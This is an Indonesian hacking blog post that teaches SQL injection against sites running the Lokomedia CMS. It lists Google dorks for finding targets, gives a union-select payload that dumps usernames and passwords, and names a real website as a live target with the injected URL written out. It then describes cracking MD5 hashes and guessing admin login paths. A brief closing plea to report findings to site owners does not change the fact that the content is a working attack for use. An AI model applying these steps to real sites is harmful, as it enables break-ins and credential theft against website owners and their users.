SELAMAT DATANG

WELCOME TO MY BLOG, GUNAKAN PENGRTAHUAN ANDA DENGAN BIJAK

Monday, September 4, 2017

Sql Lokomedia

Asalamualaikum wr.wb.
welcome back my friends,
apa kabar kalian semua, semoga kabar baik selalu menyertai kita . amin amin amin...

kali ini saya akan share tutorial sql lokomedia, mungkin sudah basi hehe, tapi akan ku makan nasi yang menjadi bubur, agar tak ada rasa percuma, semua masalahku tak akan ku kubur, ku hadapi dan aku terima.. kok jadi nyanyi wkwkkw


yasudha kita gojek aja ya..



Dork :
- Inurl:kategori-23-hiburan.html
- Inurl:hal-tentang-kami.html
- Inurl:statis-1-pengantar.html
- Inurl:statis-3-visidanmisi.html
- Inurl:statis-19-beasiswa.html
- Inurl:statis-22-kerjasama.html

Selebihnya kembangin Sendiri Oke :*
Exploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+

Live Target : http://www.ibnukatsir.or.id/statis-3-visidanmisi.html

=================== CARA NYA ========================
1. Cari target dahulu , sebagai contoh nya ,saya menggunakan DORK
kategori-23-hiburan.html lalu search di GOOGLE , nanti akan banyak
SITE nya .




2. Buka Website tersebut , http://www.ibnukatsir.or.id/statis-3-visidanmisi.html



3. lalu masukan Exploit nya kurang lebih seperti gambar diatas http://www.ibnukatsir.or.id/
statis--3'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-visidanmisi.html
Jangan sampai ada spasi , atau exploitnya ketinggalan :v dan tambahkan ( - )
sebelum angka di URL site nya




4. Nanti akan keluar username + password nya di Title web , atau di bagian page sitenya

5. Jika Password nya menggunakan HASH , Decrypt Password tersebut. (biasanya sih MD5 bukan MDR5 ya wkwkwkk

6. jika password tersebut di temukan carilah admin login nya biasanya ada di
- http://site.com/admin
- http://site.com/adminweb
- http://site.com/administrator
- http://site.com/redaktur ,atau bisa juga di cari menggunakan find admin login

gunakan dengan akal sehat, kita bisa jadi pelindung negeri kita,jika mendapatkan target segera komunikasikan kepada admin website tersebut, agar indonesia semakin strong, jangan menyerang negeri sendiri tanpa sebab, kan lucu :v sekian terima kasih.

wasalamualailum wr.wb.


EmoticonEmoticon